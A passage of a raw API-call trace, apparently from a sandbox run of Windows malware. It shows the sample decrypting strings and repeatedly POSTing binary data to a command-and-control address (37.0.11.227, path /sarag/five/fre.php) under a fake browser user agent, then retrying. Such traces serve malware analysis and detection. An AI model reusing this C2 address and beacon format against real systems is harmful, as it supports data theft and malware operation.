[0213.087] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.088] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0213.096] GetProcessHeap () returned 0x690000 [0213.096] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0213.097] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.098] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0213.098] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.099] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0213.100] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.100] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0213.100] GetProcessHeap () returned 0x690000 [0213.101] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0213.101] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.102] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0213.103] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.103] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0213.104] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.105] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0213.105] GetProcessHeap () returned 0x690000 [0213.105] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0213.105] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.106] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0213.109] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.109] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0213.110] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.111] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0213.112] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.112] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0213.112] GetProcessHeap () returned 0x690000 [0213.112] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0213.112] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0213.112] GetProcessHeap () returned 0x690000 [0213.112] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab330 [0213.112] socket (af=2, type=1, protocol=6) returned 0x4fc [0213.113] connect (s=0x4fc, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0213.139] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0213.139] GetProcessHeap () returned 0x690000 [0213.139] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0213.140] GetProcessHeap () returned 0x690000 [0213.140] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0213.141] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0213.142] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0213.142] GetProcessHeap () returned 0x690000 [0213.142] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0213.142] GetProcessHeap () returned 0x690000 [0213.143] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0213.143] GetProcessHeap () returned 0x690000 [0213.143] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0213.143] GetProcessHeap () returned 0x690000 [0213.143] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0213.144] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0213.145] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0213.145] GetProcessHeap () returned 0x690000 [0213.145] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0213.145] GetProcessHeap () returned 0x690000 [0213.146] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0213.146] send (s=0x4fc, buf=0x6ad508*, len=242, flags=0) returned 242 [0213.147] send (s=0x4fc, buf=0x6aba40*, len=159, flags=0) returned 159 [0213.147] GetProcessHeap () returned 0x690000 [0213.147] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0213.147] recv (in: s=0x4fc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0213.235] GetProcessHeap () returned 0x690000 [0213.235] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0213.235] GetProcessHeap () returned 0x690000 [0213.236] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0213.236] GetProcessHeap () returned 0x690000 [0213.238] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0213.238] GetProcessHeap () returned 0x690000 [0213.238] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0213.238] closesocket (s=0x4fc) returned 0 [0213.239] GetProcessHeap () returned 0x690000 [0213.239] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab330 | out: hHeap=0x690000) returned 1 [0213.239] GetProcessHeap () returned 0x690000 [0213.240] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0213.240] GetProcessHeap () returned 0x690000 [0213.240] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0213.241] GetProcessHeap () returned 0x690000 [0213.241] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0213.241] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x6e0) returned 0x4fc [0213.243] Sleep (dwMilliseconds=0xea60) [0213.245] GetProcessHeap () returned 0x690000 [0213.245] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0213.246] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.247] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0213.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.269] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0213.309] GetProcessHeap () returned 0x690000 [0213.309] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0213.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.311] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0213.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.312] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0213.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.313] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0213.313] GetProcessHeap () returned 0x690000 [0213.313] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0213.315] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.315] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0213.316] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.317] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0213.317] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.318] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0213.318] GetProcessHeap () returned 0x690000 [0213.318] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0213.319] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.319] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0213.320] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.321] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0213.322] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.322] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0213.323] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.323] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0213.323] GetProcessHeap () returned 0x690000 [0213.323] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0213.323] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0213.324] GetProcessHeap () returned 0x690000 [0213.324] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0213.324] GetProcessHeap () returned 0x690000 [0213.325] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0213.325] GetProcessHeap () returned 0x690000 [0213.325] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0213.325] GetProcessHeap () returned 0x690000 [0213.325] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0213.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.327] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0213.335] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.336] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0213.346] GetProcessHeap () returned 0x690000 [0213.346] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0213.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.347] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0213.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.365] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0213.366] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.366] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0213.366] GetProcessHeap () returned 0x690000 [0213.367] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0213.380] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.380] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0213.381] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.381] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0213.382] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.383] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0213.383] GetProcessHeap () returned 0x690000 [0213.383] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0213.384] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.384] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0213.385] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.385] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0213.387] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.387] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0213.391] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.392] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0213.392] GetProcessHeap () returned 0x690000 [0213.392] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0213.392] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0213.392] GetProcessHeap () returned 0x690000 [0213.392] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3e0 [0213.392] socket (af=2, type=1, protocol=6) returned 0x500 [0213.393] connect (s=0x500, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0213.419] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0213.419] GetProcessHeap () returned 0x690000 [0213.419] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeee0 [0213.419] GetProcessHeap () returned 0x690000 [0213.419] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0213.420] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0213.421] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0213.421] GetProcessHeap () returned 0x690000 [0213.421] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0213.421] GetProcessHeap () returned 0x690000 [0213.422] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0213.422] GetProcessHeap () returned 0x690000 [0213.422] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0213.422] GetProcessHeap () returned 0x690000 [0213.422] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0213.423] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0213.424] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0213.424] GetProcessHeap () returned 0x690000 [0213.424] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0213.424] GetProcessHeap () returned 0x690000 [0213.424] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0213.424] send (s=0x500, buf=0x6ad508*, len=242, flags=0) returned 242 [0213.425] send (s=0x500, buf=0x6aba40*, len=159, flags=0) returned 159 [0213.425] GetProcessHeap () returned 0x690000 [0213.425] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0213.425] recv (in: s=0x500, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0213.502] GetProcessHeap () returned 0x690000 [0213.507] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0213.509] GetProcessHeap () returned 0x690000 [0213.511] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0213.511] GetProcessHeap () returned 0x690000 [0213.512] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0213.512] GetProcessHeap () returned 0x690000 [0213.513] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeee0 | out: hHeap=0x690000) returned 1 [0213.513] closesocket (s=0x500) returned 0 [0213.514] GetProcessHeap () returned 0x690000 [0213.514] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3e0 | out: hHeap=0x690000) returned 1 [0213.514] GetProcessHeap () returned 0x690000 [0213.516] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0213.516] GetProcessHeap () returned 0x690000 [0213.516] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0213.517] GetProcessHeap () returned 0x690000 [0213.518] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0213.521] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x870) returned 0x500 [0213.546] Sleep (dwMilliseconds=0xea60) [0213.547] GetProcessHeap () returned 0x690000 [0213.547] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0213.548] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.549] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0213.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.567] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0213.595] GetProcessHeap () returned 0x690000 [0213.595] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0213.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.596] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0213.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.599] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0213.600] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.600] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0213.600] GetProcessHeap () returned 0x690000 [0213.601] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0213.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.602] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0213.603] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.603] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0213.604] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.604] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0213.604] GetProcessHeap () returned 0x690000 [0213.605] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0213.605] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.606] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0213.606] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.607] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0213.607] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.610] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0213.611] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.612] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0213.612] GetProcessHeap () returned 0x690000 [0213.612] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0213.612] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0213.612] GetProcessHeap () returned 0x690000 [0213.612] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0213.612] GetProcessHeap () returned 0x690000 [0213.613] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0213.613] GetProcessHeap () returned 0x690000 [0213.613] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0213.613] GetProcessHeap () returned 0x690000 [0213.613] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0213.614] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.614] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0213.620] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.620] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0213.627] GetProcessHeap () returned 0x690000 [0213.627] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0213.628] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.629] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0213.630] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.630] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0213.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.631] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0213.631] GetProcessHeap () returned 0x690000 [0213.631] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0213.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.633] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, 